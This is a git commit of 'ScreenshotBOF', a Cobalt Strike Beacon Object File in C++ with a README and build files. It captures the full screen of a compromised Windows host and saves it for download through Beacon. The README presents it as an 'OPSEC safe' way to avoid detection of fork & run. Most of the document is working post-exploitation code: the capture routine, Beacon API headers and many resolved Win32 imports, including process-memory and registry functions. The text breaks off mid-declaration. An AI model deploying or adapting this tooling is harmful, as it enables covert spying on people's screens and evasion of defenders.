commit a32d08289530f14815adec040ce527363a5a8912 Author: CodeXTF2 Date: Sun Oct 23 16:58:24 2022 +0800 first commit diff --git a/.gitignore b/.gitignore new file mode 100644 index 0000000..b66ae99 --- /dev/null +++ b/.gitignore @@ -0,0 +1 @@ +/.vs \ No newline at end of file diff --git a/README.md b/README.md new file mode 100644 index 0000000..391a2fd --- /dev/null +++ b/README.md @@ -0,0 +1,21 @@ +# ScreenshotBOF + +An alternative screenshot capability for Cobalt Strike that uses WinAPI and does not perform a fork & run. Screenshot saved to disk as a file. + +## Usage +1. import the screenshotBOF.cna script into Cobalt Strike +2. use the command screenshot_bof +3. Download the screenshot from the target e.g. +``` +download screenshot.bmp +``` + +## Notes +- no evasion is performed, which should be fine since the WinAPIs used are not malicious +- in memory downloading of screenshots is planned to be added +- the filename can be changed in the source code. + +## Why did I make this? +Cobalt Strike uses a technique known as fork & run for many of its post-ex capabilities, including the screenshot command. +While this behaviour provides stability, it is now well known and heavily monitored for. This BOF is meant to provide a more +OPSEC safe version of the screenshot capability. \ No newline at end of file diff --git a/ScreenshotBOF.sln b/ScreenshotBOF.sln new file mode 100644 index 0000000..9997b26 --- /dev/null +++ b/ScreenshotBOF.sln @@ -0,0 +1,37 @@ + +Microsoft Visual Studio Solution File, Format Version 12.00 +# Visual Studio Version 16 +VisualStudioVersion = 16.0.30517.126 +MinimumVisualStudioVersion = 10.0.40219.1 +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "ScreenshotBOF", "ScreenshotBOF\ScreenshotBOF.vcxproj", "{C04AB0F3-F7E1-4996-9CFA-D1337332EF29}" +EndProject +Global + GlobalSection(SolutionConfigurationPlatforms) = preSolution + BOF|x64 = BOF|x64 + BOF|x86 = BOF|x86 + Debug|x64 = Debug|x64 + Debug|x86 = Debug|x86 + Release|x64 = Release|x64 + Release|x86 = Release|x86 + EndGlobalSection + GlobalSection(ProjectConfigurationPlatforms) = postSolution + {C04AB0F3-F7E1-4996-9CFA-D1337332EF29}.BOF|x64.ActiveCfg = BOF|x64 + {C04AB0F3-F7E1-4996-9CFA-D1337332EF29}.BOF|x64.Build.0 = BOF|x64 + {C04AB0F3-F7E1-4996-9CFA-D1337332EF29}.BOF|x86.ActiveCfg = BOF|Win32 + {C04AB0F3-F7E1-4996-9CFA-D1337332EF29}.BOF|x86.Build.0 = BOF|Win32 + {C04AB0F3-F7E1-4996-9CFA-D1337332EF29}.Debug|x64.ActiveCfg = Debug|x64 + {C04AB0F3-F7E1-4996-9CFA-D1337332EF29}.Debug|x64.Build.0 = Debug|x64 + {C04AB0F3-F7E1-4996-9CFA-D1337332EF29}.Debug|x86.ActiveCfg = Debug|Win32 + {C04AB0F3-F7E1-4996-9CFA-D1337332EF29}.Debug|x86.Build.0 = Debug|Win32 + {C04AB0F3-F7E1-4996-9CFA-D1337332EF29}.Release|x64.ActiveCfg = Release|x64 + {C04AB0F3-F7E1-4996-9CFA-D1337332EF29}.Release|x64.Build.0 = Release|x64 + {C04AB0F3-F7E1-4996-9CFA-D1337332EF29}.Release|x86.ActiveCfg = Release|Win32 + {C04AB0F3-F7E1-4996-9CFA-D1337332EF29}.Release|x86.Build.0 = Release|Win32 + EndGlobalSection + GlobalSection(SolutionProperties) = preSolution + HideSolutionNode = FALSE + EndGlobalSection + GlobalSection(ExtensibilityGlobals) = postSolution + SolutionGuid = {BB40A5A4-261A-4411-8CC0-615E484001A5} + EndGlobalSection +EndGlobal diff --git a/ScreenshotBOF/ScreenshotBOF.vcxproj b/ScreenshotBOF/ScreenshotBOF.vcxproj new file mode 100644 index 0000000..95c3510 --- /dev/null +++ b/ScreenshotBOF/ScreenshotBOF.vcxproj @@ -0,0 +1,277 @@ + + + + + BOF + Win32 + + + Debug + Win32 + + + Release + Win32 + + + BOF + x64 + + + Debug + x64 + + + Release + x64 + + + + 16.0 + Win32Proj + {c04ab0f3-f7e1-4996-9cfa-d1337332ef29} + ScreenshotBOF + 10.0 + ScreenshotBOF + + + + Application + true + v142 + Unicode + + + Application + false + v142 + true + Unicode + + + Application + true + v142 + Unicode + + + Application + false + v142 + true + Unicode + + + v142 + Console + + + + + Console + + v142 + + + + + + + + + + + + + + + + + + + + + + + $(SolutionDir)bin\$(Configuration)\$(ProjectName).x64.obj;*.cdf;*.cache;*.obj;*.obj.enc;*.ilk;*.ipdb;*.iobj;*.resources;*.tlb;*.tli;*.tlh;*.tmp;*.rsp;*.pgc;*.pgd;*.meta;*.tlog;*.manifest;*.res;*.pch;*.exp;*.idb;*.rep;*.xdc;*.pdb;*_manifest.rc;*.bsc;*.sbr;*.xml;*.metagen;*.bi;$(SolutionDir)bin\$(Configuration)\$(ProjectName).x64.o;$(ExtensionsToDeleteOnClean) + + $(SolutionDir)bin\$(Configuration)\ + intermediary\$(Configuration)\$(Platform)\ + $(ProjectName)x64 + + + $(SolutionDir)bin\$(Configuration)\$(ProjectName).x86.obj;*.cdf;*.cache;*.obj;*.obj.enc;*.ilk;*.ipdb;*.iobj;*.resources;*.tlb;*.tli;*.tlh;*.tmp;*.rsp;*.pgc;*.pgd;*.meta;*.tlog;*.manifest;*.res;*.pch;*.exp;*.idb;*.rep;*.xdc;*.pdb;*_manifest.rc;*.bsc;*.sbr;*.xml;*.metagen;*.bi;$(ExtensionsToDeleteOnClean) + + $(SolutionDir)bin\$(Configuration)\ + $(ProjectName)x32 + intermediary\$(Configuration)\x86\ + + + $(SolutionDir)bin\$(Configuration)\ + $(ProjectName)64 + + + $(SolutionDir)bin\$(Configuration)\ + $(ProjectName)32 + + + $(SolutionDir)bin\$(Configuration)\ + $(ProjectName)32 + + + $(SolutionDir)bin\$(Configuration)\ + $(ProjectName)64 + + + + EnableAllWarnings + true + WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) + false + + + Level1 + + + Console + true + + + + + Level4 + true + true + true + WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) + false + Level1 + + + + + Console + true + true + true + + + + + EnableAllWarnings + true + _DEBUG;_CONSOLE;%(PreprocessorDefinitions) + false + true + Level1 + + + Console + true + + + + + Level4 + true + true + true + NDEBUG;_CONSOLE;%(PreprocessorDefinitions) + false + Level1 + + + Console + true + true + true + + + + + /c /Fo"intermediary\BOF\x64\source" + + + None + false + BOF;%(PreprocessorDefinitions) + + + + + + + + + + + + + + + + + + + + + + + + Level1 + + + xcopy /y "$(SolutionDir)$(ProjectName)\intermediary\$(Configuration)\$(Platform)\source.obj" "$(SolutionDir)bin\$(Configuration)\$(ProjectName).x64.o*"; +powershell -ExecutionPolicy Unrestricted -command "& { . '$(SolutionDir)$(ProjectName)\resources\strip_bof.ps1'; strip-bof -Path '$(SolutionDir)bin\$(Configuration)\$(ProjectName).x64.obj' }" + + + + + /c /Fo"intermediary\BOF\x86\source" + + + None + false + BOF;%(PreprocessorDefinitions) + + + + + + + + + + + + + + + + + + + + + Level1 + + + xcopy /y "$(SolutionDir)$(ProjectName)\intermediary\$(Configuration)\x86\source.obj" "$(SolutionDir)bin\$(Configuration)\$(ProjectName).x86.o*"; + powershell -ExecutionPolicy Unrestricted -command "& { . '$(SolutionDir)$(ProjectName)\resources\strip_bof.ps1'; strip-bof -Path '$(SolutionDir)bin\$(Configuration)\$(ProjectName).x86.obj' }" + + + + + + + + + + + + + + + + + \ No newline at end of file diff --git a/ScreenshotBOF/ScreenshotBOF.vcxproj.filters b/ScreenshotBOF/ScreenshotBOF.vcxproj.filters new file mode 100644 index 0000000..582dd13 --- /dev/null +++ b/ScreenshotBOF/ScreenshotBOF.vcxproj.filters @@ -0,0 +1,32 @@ + + + + + {f23d5754-25e5-46a9-b783-8685f48d2291} + + + {72263c50-a87a-4d99-9746-3def65c61180} + + + {999efb6a-e35d-49fb-bf81-1ebab5077dd0} + + + + + Source Files + + + + + Header Files + + + Header Files + + + + + Resources + + + \ No newline at end of file diff --git a/ScreenshotBOF/ScreenshotBOF.vcxproj.user b/ScreenshotBOF/ScreenshotBOF.vcxproj.user new file mode 100644 index 0000000..88a5509 --- /dev/null +++ b/ScreenshotBOF/ScreenshotBOF.vcxproj.user @@ -0,0 +1,4 @@ + + + + \ No newline at end of file diff --git a/ScreenshotBOF/Source.cpp b/ScreenshotBOF/Source.cpp new file mode 100644 index 0000000..cb6669e --- /dev/null +++ b/ScreenshotBOF/Source.cpp @@ -0,0 +1,151 @@ +#include +#include +#include "bofdefs.h" +#pragma comment(lib, "User32.lib") +#pragma comment(lib, "Gdi32.lib") + + + +#pragma region error_handling +#define print_error(msg, hr) _print_error(__FUNCTION__, __LINE__, msg, hr) +BOOL _print_error(char* func, int line, char* msg, HRESULT hr) { +#ifdef BOF + BeaconPrintf(CALLBACK_ERROR, "(%s at %d): %s 0x%08lx", func, line, msg, hr); +#else + printf("[-] (%s at %d): %s 0x%08lx", func, line, msg, hr); +#endif // BOF + + return FALSE; +} +#pragma endregion + + +BOOL SaveHBITMAPToFile(HBITMAP hBitmap, LPCTSTR lpszFileName) +{ + HDC hDC; + int iBits; + WORD wBitCount; + DWORD dwPaletteSize = 0, dwBmBitsSize = 0, dwDIBSize = 0, dwWritten = 0; + BITMAP Bitmap0; + BITMAPFILEHEADER bmfHdr; + BITMAPINFOHEADER bi; + LPBITMAPINFOHEADER lpbi; + HANDLE fh, hDib, hPal, hOldPal2 = NULL; + hDC = CreateDC(TEXT("DISPLAY"), NULL, NULL, NULL); + iBits = GetDeviceCaps(hDC, BITSPIXEL) * GetDeviceCaps(hDC, PLANES); + DeleteDC(hDC); + if (iBits <= 1) + wBitCount = 1; + else if (iBits <= 4) + wBitCount = 4; + else if (iBits <= 8) + wBitCount = 8; + else + wBitCount = 24; + GetObject(hBitmap, sizeof(Bitmap0), (LPSTR)&Bitmap0); + bi.biSize = sizeof(BITMAPINFOHEADER); + bi.biWidth = Bitmap0.bmWidth; + bi.biHeight = -Bitmap0.bmHeight; + bi.biPlanes = 1; + bi.biBitCount = wBitCount; + bi.biCompression = BI_RGB; + bi.biSizeImage = 0; + bi.biXPelsPerMeter = 0; + bi.biYPelsPerMeter = 0; + bi.biClrImportant = 0; + bi.biClrUsed = 256; + dwBmBitsSize = ((Bitmap0.bmWidth * wBitCount + 31) & ~31) / 8 + * Bitmap0.bmHeight; + hDib = GlobalAlloc(GHND, dwBmBitsSize + dwPaletteSize + sizeof(BITMAPINFOHEADER)); + lpbi = (LPBITMAPINFOHEADER)GlobalLock(hDib); + *lpbi = bi; + + hPal = GetStockObject(DEFAULT_PALETTE); + if (hPal) + { + hDC = GetDC(NULL); + hOldPal2 = SelectPalette(hDC, (HPALETTE)hPal, FALSE); + RealizePalette(hDC); + } + + + GetDIBits(hDC, hBitmap, 0, (UINT)Bitmap0.bmHeight, (LPSTR)lpbi + sizeof(BITMAPINFOHEADER) + + dwPaletteSize, (BITMAPINFO*)lpbi, DIB_RGB_COLORS); + + if (hOldPal2) + { + SelectPalette(hDC, (HPALETTE)hOldPal2, TRUE); + RealizePalette(hDC); + ReleaseDC(NULL, hDC); + } + + fh = CreateFile(lpszFileName, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, + FILE_ATTRIBUTE_NORMAL | FILE_FLAG_SEQUENTIAL_SCAN, NULL); + + if (fh == INVALID_HANDLE_VALUE) + return FALSE; + + bmfHdr.bfType = 0x4D42; // "BM" + dwDIBSize = sizeof(BITMAPFILEHEADER) + sizeof(BITMAPINFOHEADER) + dwPaletteSize + dwBmBitsSize; + bmfHdr.bfSize = dwDIBSize; + bmfHdr.bfReserved1 = 0; + bmfHdr.bfReserved2 = 0; + bmfHdr.bfOffBits = (DWORD)sizeof(BITMAPFILEHEADER) + (DWORD)sizeof(BITMAPINFOHEADER) + dwPaletteSize; + + WriteFile(fh, (LPSTR)&bmfHdr, sizeof(BITMAPFILEHEADER), &dwWritten, NULL); + + WriteFile(fh, (LPSTR)lpbi, dwDIBSize, &dwWritten, NULL); + GlobalUnlock(hDib); + GlobalFree(hDib); + CloseHandle(fh); + return TRUE; +} + +#ifdef BOF +void go(char* buff, int len) { + BeaconPrintf(0x0, "[*] Tasked beacon to printscreen and save to disk"); + int x1, y1, x2, y2, w, h; + // get screen dimensions + x1 = GetSystemMetrics(SM_XVIRTUALSCREEN); + y1 = GetSystemMetrics(SM_YVIRTUALSCREEN); + x2 = GetSystemMetrics(SM_CXVIRTUALSCREEN); + y2 = GetSystemMetrics(SM_CYVIRTUALSCREEN); + w = x2 - x1; + h = y2 - y1; + + // copy screen to bitmap + HDC hScreen = GetDC(NULL); + HDC hDC = CreateCompatibleDC(hScreen); + HBITMAP hBitmap = CreateCompatibleBitmap(hScreen, w, h); + HGDIOBJ old_obj = SelectObject(hDC, hBitmap); + BOOL bRet = BitBlt(hDC, 0, 0, w, h, hScreen, x1, y1, SRCCOPY); + + //I was going to pull from the clipboard but then realized it + //was more trouble than it was worth, so I just saved it to a file. ~ CodeX + + // save bitmap to clipboard + OpenClipboard(NULL); + EmptyClipboard(); + SetClipboardData(CF_BITMAP, hBitmap); + CloseClipboard(); + + BeaconPrintf(0x0, "[+] PrintScreen saved to bitmap..."); + LPCSTR filename = "screenshot.bmp"; + SaveHBITMAPToFile(hBitmap, (LPCTSTR)filename); + + BeaconPrintf(0x0, "[+] Printscreen bitmap saved to screenshot.bmp"); + // clean up + SelectObject(hDC, old_obj); + DeleteDC(hDC); + ReleaseDC(NULL, hScreen); + DeleteObject(hBitmap); +} + + +#else + +void main(int argc, char* argv[]) { + +} + +#endif \ No newline at end of file diff --git a/ScreenshotBOF/beacon.h b/ScreenshotBOF/beacon.h new file mode 100644 index 0000000..e70bebc --- /dev/null +++ b/ScreenshotBOF/beacon.h @@ -0,0 +1,63 @@ +#pragma once + +/* + * Beacon Object Files (BOF) + * ------------------------- + * A Beacon Object File is a light-weight post exploitation tool that runs + * with Beacon's inline-execute command. + * + * Cobalt Strike 4.1. + */ + +/* data API */ +typedef struct { + char * original; /* the original buffer [so we can free it] */ + char * buffer; /* current pointer into our buffer */ + int length; /* remaining length of data */ + int size; /* total size of this buffer */ +} datap; + +DECLSPEC_IMPORT void BeaconDataParse(datap * parser, char * buffer, int size); +DECLSPEC_IMPORT int BeaconDataInt(datap * parser); +DECLSPEC_IMPORT short BeaconDataShort(datap * parser); +DECLSPEC_IMPORT int BeaconDataLength(datap * parser); +DECLSPEC_IMPORT char * BeaconDataExtract(datap * parser, int * size); + +/* format API */ +typedef struct { + char * original; /* the original buffer [so we can free it] */ + char * buffer; /* current pointer into our buffer */ + int length; /* remaining length of data */ + int size; /* total size of this buffer */ +} formatp; + +DECLSPEC_IMPORT void BeaconFormatAlloc(formatp * format, int maxsz); +DECLSPEC_IMPORT void BeaconFormatReset(formatp * format); +DECLSPEC_IMPORT void BeaconFormatFree(formatp * format); +DECLSPEC_IMPORT void BeaconFormatAppend(formatp * format, char * text, int len); +DECLSPEC_IMPORT void BeaconFormatPrintf(formatp * format, char * fmt, ...); +DECLSPEC_IMPORT char * BeaconFormatToString(formatp * format, int * size); +DECLSPEC_IMPORT void BeaconFormatInt(formatp * format, int value); + +/* Output Functions */ +#define CALLBACK_OUTPUT 0x0 +#define CALLBACK_OUTPUT_OEM 0x1e +#define CALLBACK_ERROR 0x0d +#define CALLBACK_OUTPUT_UTF8 0x20 + +DECLSPEC_IMPORT void BeaconPrintf(int type, char * fmt, ...); +DECLSPEC_IMPORT void BeaconOutput(int type, char * data, int len); + +/* Token Functions */ +DECLSPEC_IMPORT BOOL BeaconUseToken(HANDLE token); +DECLSPEC_IMPORT void BeaconRevertToken(); +DECLSPEC_IMPORT BOOL BeaconIsAdmin(); + +/* Spawn+Inject Functions */ +DECLSPEC_IMPORT void BeaconGetSpawnTo(BOOL x86, char * buffer, int length); +DECLSPEC_IMPORT void BeaconInjectProcess(HANDLE hProc, int pid, char * payload, int p_len, int p_offset, char * arg, int a_len); +DECLSPEC_IMPORT void BeaconInjectTemporaryProcess(PROCESS_INFORMATION * pInfo, char * payload, int p_len, int p_offset, char * arg, int a_len); +DECLSPEC_IMPORT void BeaconCleanupProcess(PROCESS_INFORMATION * pInfo); + +/* Utility Functions */ +DECLSPEC_IMPORT BOOL toWideChar(char * src, wchar_t * dst, int max); diff --git a/ScreenshotBOF/bofdefs.h b/ScreenshotBOF/bofdefs.h new file mode 100644 index 0000000..c960e31 --- /dev/null +++ b/ScreenshotBOF/bofdefs.h @@ -0,0 +1,361 @@ +#pragma once +/* some code and/or ideas are from trustedsec SA Github repo -- thankyou trustedsec! */ +#include + + +#ifdef BOF + +#ifdef __cplusplus +extern "C" { +#endif + +#include "beacon.h" + +void go(char* buff, int len); + +/* resolve some extra funcs for the screenshot */ + + DECLSPEC_IMPORT DWORD WINAPI User32$MessageBoxA(HWND, LPCTSTR, LPCTSTR, UINT); +#define MessageBoxCustom User32$MessageBoxA + + DECLSPEC_IMPORT int WINAPI User32$GetSystemMetrics(int nIndex); +#define GetSystemMetrics User32$GetSystemMetrics + + DECLSPEC_IMPORT HDC WINAPI User32$GetDC(HWND hWnd); +#define GetDC User32$GetDC + + DECLSPEC_IMPORT HDC WINAPI GDI32$CreateCompatibleDC(HDC hdc); +#define CreateCompatibleDC GDI32$CreateCompatibleDC + + DECLSPEC_IMPORT HBITMAP WINAPI GDI32$CreateCompatibleBitmap(HDC hdc, int cx, int cy); +#define CreateCompatibleBitmap GDI32$CreateCompatibleBitmap + + DECLSPEC_IMPORT HGDIOBJ WINAPI GDI32$SelectObject(HDC hdc, HGDIOBJ h); +#define SelectObject GDI32$SelectObject + + DECLSPEC_IMPORT BOOL WINAPI GDI32$BitBlt(HDC hdc, + int x, + int y, + int cx, + int cy, + HDC hdcSrc, + int x1, + int y1, + DWORD rop); +#define BitBlt GDI32$BitBlt + + DECLSPEC_IMPORT BOOL WINAPI User32$OpenClipboard(HWND hWndNewOwner); +#define OpenClipboard User32$OpenClipboard + + DECLSPEC_IMPORT BOOL WINAPI User32$EmptyClipboard(); +#define EmptyClipboard User32$EmptyClipboard + + DECLSPEC_IMPORT BOOL WINAPI User32$SetClipboardData(UINT uFormat, HANDLE hMem); +#define SetClipboardData User32$SetClipboardData + + DECLSPEC_IMPORT BOOL WINAPI User32$CloseClipboard(); +#define CloseClipboard User32$CloseClipboard + + DECLSPEC_IMPORT BOOL WINAPI GDI32$DeleteDC(HDC hdc); +#define DeleteDC GDI32$DeleteDC + + DECLSPEC_IMPORT int WINAPI User32$ReleaseDC(HWND hWnd, HDC hDC); +#define ReleaseDC User32$ReleaseDC + + DECLSPEC_IMPORT HGDIOBJ WINAPI GDI32$DeleteObject(HGDIOBJ ho); +#define DeleteObject GDI32$DeleteObject + + + + /* End of function resolutions for screenshot */ + + /* Resolve some functions for writing BMP to disk*/ + + DECLSPEC_IMPORT HDC WINAPI GDI32$CreateDCA(LPCSTR pwszDriver, + LPCSTR pwszDevice, + LPCSTR pszPort, + const DEVMODEA* pdm); +#define CreateDCA GDI32$CreateDCA + + DECLSPEC_IMPORT int WINAPI GDI32$GetDeviceCaps(HDC hdc, + int index); +#define GetDeviceCaps GDI32$GetDeviceCaps + + DECLSPEC_IMPORT int WINAPI GDI32$GetObjectA(HANDLE h, + int c, + LPVOID pv); +#define GetObjectA GDI32$GetObjectA + DECLSPEC_IMPORT HGLOBAL WINAPI KERNEL32$GlobalAlloc( + UINT uFlags, + SIZE_T dwBytes); +#define GlobalAlloc KERNEL32$GlobalAlloc + + DECLSPEC_IMPORT WINBASEAPI LPVOID WINAPI KERNEL32$GlobalLock(HGLOBAL); +#define GlobalLock KERNEL32$GlobalLock + + DECLSPEC_IMPORT WINGDIAPI HGDIOBJ WINAPI GDI32$GetStockObject(int); +#define GetStockObject GDI32$GetStockObject + + DECLSPEC_IMPORT WINGDIAPI HPALETTE WINAPI GDI32$SelectPalette(HDC, HPALETTE, BOOL); +#define SelectPalette GDI32$SelectPalette + + DECLSPEC_IMPORT WINGDIAPI UINT WINAPI GDI32$RealizePalette(HDC); +#define RealizePalette GDI32$RealizePalette + + DECLSPEC_IMPORT WINGDIAPI int WINAPI GDI32$GetDIBits(HDC hdc, + HBITMAP hbm, + UINT start, + UINT cLines, + LPVOID lpvBits, + LPBITMAPINFO lpbmi, + UINT usage); +#define GetDIBits GDI32$GetDIBits + + DECLSPEC_IMPORT WINBASEAPI BOOL WINAPI KERNEL32$GlobalUnlock(HGLOBAL); +#define GlobalUnlock KERNEL32$GlobalUnlock + + DECLSPEC_IMPORT WINBASEAPI HGLOBAL WINAPI KERNEL32$GlobalFree(HGLOBAL); +#define GlobalFree KERNEL32$GlobalFree + + DECLSPEC_IMPORT WINBASEAPI BOOL WINAPI KERNEL32$CloseHandle(HANDLE); +#define CloseHandle KERNEL32$CloseHandle + + + + + /* End of function resolutions for writing BMP to disk */ + + +/* COM */ +DECLSPEC_IMPORT HRESULT WINAPI OLE32$CLSIDFromString(LPCWSTR, LPCLSID); +DECLSPEC_IMPORT HRESULT WINAPI OLE32$CoCreateInstance(REFCLSID rclsid, LPUNKNOWN pUnkOuter, DWORD dwClsContext, REFIID riid, LPVOID* ppv); +DECLSPEC_IMPORT HRESULT WINAPI OLE32$CoInitializeEx(LPVOID, DWORD); +DECLSPEC_IMPORT VOID WINAPI OLE32$CoUninitialize(); +DECLSPEC_IMPORT HRESULT WINAPI OLE32$IIDFromString(LPWSTR lpsz, LPIID lpiid); +DECLSPEC_IMPORT HRESULT WINAPI OLE32$CoInitialize(LPVOID pvReserved); +DECLSPEC_IMPORT HRESULT WINAPI OLE32$CoCreateInstanceEx(REFCLSID, IUnknown*, DWORD, COSERVERINFO*, DWORD, MULTI_QI*); +DECLSPEC_IMPORT BSTR WINAPI OleAut32$SysAllocString(const OLECHAR*); +DECLSPEC_IMPORT LPVOID WINAPI OLEAUT32$VariantInit(VARIANTARG* pvarg); +DECLSPEC_IMPORT HRESULT WINAPI OLE32$CoInitializeSecurity(PSECURITY_DESCRIPTOR pSecDesc, LONG cAuthSvc, SOLE_AUTHENTICATION_SERVICE* asAuthSvc, void* pReserved1, DWORD dwAuthnLevel, DWORD dwImpLevel, void* pAuthList, DWORD dwCapabilities, void* pReserved3); + +/* Registry */ +DECLSPEC_IMPORT LSTATUS APIENTRY ADVAPI32$RegOpenKeyExA(HKEY hKey, LPCSTR lpSubKey, DWORD ulOptions, REGSAM samDesired, PHKEY phkResult); +DECLSPEC_IMPORT LSTATUS APIENTRY ADVAPI32$RegDeleteTreeA(HKEY hKey, LPCSTR lpSubKey); +DECLSPEC_IMPORT LSTATUS APIENTRY ADVAPI32$RegCreateKeyExA(HKEY hKey, LPCSTR lpSubKey, DWORD Reserved, LPSTR lpClass, DWORD dwOptions, REGSAM samDesired, + CONST LPSECURITY_ATTRIBUTES lpSecurityAttributes, PHKEY phkResult, LPDWORD lpdwDisposition); +DECLSPEC_IMPORT LSTATUS APIENTRY ADVAPI32$RegSetValueExA(HKEY hKey, LPCSTR lpValueName, DWORD Reserved, DWORD dwType, + CONST BYTE* lpData, DWORD cbData); + + +/* FileSystem */ +DECLSPEC_IMPORT HANDLE WINAPI KERNEL32$CreateFileA(LPCSTR lpFileName, DWORD dwDesiredAccess, DWORD dwShareMode, LPSECURITY_ATTRIBUTES lpSecurityAttributes, DWORD dwCreationDisposition, DWORD dwFlagsAndAttributes, HANDLE hTemplateFile); +DECLSPEC_IMPORT DWORD WINAPI KERNEL32$SetFilePointer(HANDLE hFile, LONG lDistanceToMove, PLONG lpDistanceToMoveHigh, DWORD dwMoveMethod); +DECLSPEC_IMPORT BOOL WINAPI KERNEL32$SetFilePointerEx(HANDLE hFile, LARGE_INTEGER liDistanceToMove, PLARGE_INTEGER lpDistanceToMoveHigh, DWORD dwMoveMethod); +DECLSPEC_IMPORT BOOL WINAPI KERNEL32$WriteFile(HANDLE hFile, LPCVOID lpBuffer, DWORD nNumberOfBytesToWrite, LPDWORD lpNumberOfBytesWritten, LPOVERLAPPED lpOverlapped); +DECLSPEC_IMPORT BOOL WINAPI KERNEL32$GetFileSizeEx(HANDLE hFile, PLARGE_INTEGER lpFileSize); +DECLSPEC_IMPORT DWORD WINAPI VERSION$GetFileVersionInfoSizeW(LPCWSTR lptstrFilenamea, LPDWORD lpdwHandle); +DECLSPEC_IMPORT BOOL WINAPI VERSION$GetFileVersionInfoW(LPCWSTR lptstrFilename, DWORD dwHandle, DWORD dwLen, LPVOID lpData); +DECLSPEC_IMPORT BOOL WINAPI VERSION$VerQueryValueW(LPCVOID pBlock, LPCWSTR lpSubBlock, LPVOID* lplpBuffer, PUINT puLen); + + +/* Memory */ +DECLSPEC_IMPORT LPVOID WINAPI KERNEL32$HeapAlloc(HANDLE hHeap, DWORD dwFlags, SIZE_T dwBytes); +DECLSPEC_IMPORT BOOL WINAPI KERNEL32$HeapFree(HANDLE, DWORD, PVOID); +DECLSPEC_IMPORT LPVOID WINAPI KERNEL32$HeapReAlloc(HANDLE hHeap, DWORD dwFlags, LPVOID lpMem, SIZE_T dwBytes); +DECLSPEC_IMPORT void* __cdecl MSVCRT$memcpy(LPVOID, LPVOID, size_t); +DECLSPEC_IMPORT void __cdecl MSVCRT$memset(void*, int, size_t); + + +/* Process */ +DECLSPEC_IMPORT HANDLE WINAPI KERNEL32$OpenProcess(DWORD dwDesiredAccess, BOOL bInheritHandle, DWORD dwProcessId); +DECLSPEC_IMPORT BOOL WINAPI ADVAPI32$CreateProcessWithLogonW(LPCWSTR lpUsername, LPCWSTR lpDomain, LPCWSTR lpPassword, DWORD dwLogonFlags, LPCWSTR lpApplicationName, LPWSTR lpCommandLine, DWORD dwCreationFlags, LPVOID lpEnvironment, LPCWSTR lpCurrentDirectory, LPSTARTUPINFOW lpStartupInfo, LPPROCESS_INFORMATION lpProcessInformation); +DECLSPEC_IMPORT HANDLE WINAPI KERNEL32$GetProcessHeap(); +DECLSPEC_IMPORT SIZE_T WINAPI KERNEL32$VirtualQueryEx(HANDLE hProcess, LPCVOID lpAddress, PMEMORY_BASIC_INFORMATION lpBuffer, SIZE_T dwLength); +DECLSPEC_IMPORT DWORD WINAPI KERNEL32$GetProcessId(HANDLE Process); +DECLSPEC_IMPORT BOOL WINAPI KERNEL32$ReadProcessMemory(HANDLE hProcess, LPCVOID lpBaseAddress, LPVOID lpBuffer, SIZE_T nSize, SIZE_T* lpNumberOfBytesRead); +DECLSPEC_IMPORT VOID WINAPI KERNEL32$Sleep(DWORD dwMilliseconds); +DECLSPEC_IMPORT HANDLE WINAPI KERNEL32$GetCurrentProcess(VOID); +DECLSPEC_IMPORT BOOL WINAPI ADVAPI32$LookupPrivilegeValueW(LPCWSTR lpSystemName, LPCWSTR lpName, PLUID lpLuid); +DECLSPEC_IMPORT DWORD WINAPI PSAPI$GetModuleFileNameExW(HANDLE hProcess, HMODULE hModule, LPWSTR lpFilename, DWORD nSize); + + +/* GetLast Error */ +DECLSPEC_IMPORT DWORD WINAPI KERNEL32$GetLastError(VOID); + + +/* Directories */ +DECLSPEC_IMPORT BOOL WINAPI KERNEL32$RemoveDirectoryA(LPCSTR); +DECLSPEC_IMPORT BOOL WINAPI KERNEL32$CreateDirectoryA(LPCSTR lpPathName, LPSECURITY_ATTRIBUTES lpSecurityAttributes); +DECLSPEC_IMPORT BOOL WINAPI KERNEL32$MoveFileA(LPCSTR lpExistingFileName, LPCSTR lpNewFileName); +DECLSPEC_IMPORT BOOL WINAPI SHLWAPI$PathIsDirectoryA(LPCSTR); +DECLSPEC_IMPORT BOOL WINAPI SHLWAPI$PathFileExistsA(LPCSTR pszPath); + + +/* strings */ +DECLSPEC_IMPORT PSTR WINAPI SHLWAPI$StrChrA(PCSTR pszStart, WORD wMatch); +DECLSPEC_IMPORT LPSTR __cdecl MSVCRT$strchr(LPSTR, int); +DECLSPEC_IMPORT errno_t __cdecl MSVCRT$strcat_s(LPSTR, size_t, LPCSTR); +DECLSPEC_IMPORT errno_t __cdecl MSVCRT$strcpy_s(LPSTR, size_t, LPCSTR); +DECLSPEC_IMPORT errno_t __cdecl MSVCRT$strncpy_s(LPSTR, size_t, LPCSTR, size_t); +DECLSPEC_IMPORT int __cdecl MSVCRT$_snprintf(LPSTR, size_t, LPCSTR, ...); +DECLSPEC_IMPORT void WINAPI MSVCRT$sprintf(char*, char[], ...); +DECLSPEC_IMPORT int __cdecl MSVCRT$_vsnprintf(LPSTR, size_t, LPCSTR, va_list); +DECLSPEC_IMPORT size_t __cdecl MSVCRT$wcslen(LPCWSTR); +DECLSPEC_IMPORT int __cdecl MSVCRT$strcmp(const char* _Str1, const char* _Str2); +DECLSPEC_IMPORT LPSTR WINAPI Kernel32$lstrcpyA(LPSTR lpString1, LPCSTR lpString2); +DECLSPEC_IMPORT LPSTR WINAPI Kernel32$lstrcatA(LPSTR lpString1, LPCSTR lpString2); +DECLSPEC_IMPORT LPSTR WINAPI Kernel32$lstrcpynA(LPSTR lpString1, LPCSTR lpString2, int iMaxLength); +DECLSPEC_IMPORT int WINAPI KERNEL32$lstrlenW(LPCWSTR lpString); +DECLSPEC_IMPORT LPWSTR WINAPI KERNEL32$lstrcpyW(LPWSTR lpString1, LPCWSTR lpString2); + + +/* RPC */ +DECLSPEC_IMPORT RPC_STATUS RPC_ENTRY Rpcrt4$RpcStringFreeA(RPC_CSTR* String); +DECLSPEC_IMPORT RPC_STATUS RPC_ENTRY Rpcrt4$UuidCreate(UUID* Uuid); +DECLSPEC_IMPORT RPC_STATUS RPC_ENTRY Rpcrt4$UuidToStringA(const UUID* Uuid, RPC_CSTR* StringUuid); + + +/* Random */ +DECLSPEC_IMPORT void WINAPI MSVCRT$srand(int initial); +DECLSPEC_IMPORT int WINAPI MSVCRT$rand(); + + +/* DateTime */ +DECLSPEC_IMPORT time_t WINAPI 